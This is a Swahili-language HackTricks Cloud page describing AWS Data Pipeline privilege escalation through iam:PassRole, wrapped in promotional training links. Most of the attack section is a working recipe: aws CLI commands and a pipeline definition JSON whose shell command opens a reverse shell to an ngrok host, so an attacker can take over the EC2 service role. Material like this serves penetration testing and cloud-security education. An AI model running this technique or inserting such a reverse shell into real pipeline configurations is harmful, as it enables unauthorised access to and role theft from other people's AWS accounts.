HackTricks CloudAWS - Datapipeline Privesc
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
datapipeline
Kwa maelezo zaidi kuhusu datapipeline angalia:
AWS - DataPipeline, CodePipeline & CodeCommit Enum
iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline
Watumiaji wenye idhini hizi wanaweza kuongeza mamlaka kwa kuunda Data Pipeline ili kutekeleza amri zisizo na mipaka kwa kutumia idhini za jukumu lililotolewa:
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
Baada ya kuunda pipeline, mshambuliaji anasasisha ufafanuzi wake ili kuamuru vitendo maalum au uundaji wa rasilimali:
{
"objects": [
{
"id": "CreateDirectory",
"type": "ShellCommandActivity",
"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn": { "ref": "instance" }
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id": "instance",
"name": "instance",
"type": "Ec2Resource",
"actionOnTaskFailure": "terminate",
"actionOnResourceFailure": "retryAll",
"maximumRetries": "1",
"instanceType": "t2.micro",
"securityGroups": ["default"],
"role": "assumable_datapipeline",
"resourceRole": "assumable_ec2_profile_instance"
}
]
}
note
Kumbuka kwamba role katika mistari 14, 15 na 27 inahitaji kuwa role inasemekana na datapipeline.amazonaws.com na role katika mstari 28 inahitaji kuwa role inayoweza kusemwa na ec2.amazonaws.com yenye profaili ya EC2.
Zaidi ya hayo, mfano wa EC2 utaweza tu kupata role inayoweza kusemwa na mfano wa EC2 (hivyo unaweza kuiba hiyo pekee).
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json
Faili la mwelekeo wa pipeline, lililotengenezwa na mshambuliaji, lina maagizo ya kutekeleza amri au kuunda rasilimali kupitia AWS API, likitumia ruhusa za jukumu la Data Pipeline ili kupata haki za ziada.
Athari Zinazoweza Kutokea: Privesc moja kwa moja kwa jukumu la huduma ya ec2 lililotajwa.
Marejeleo
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.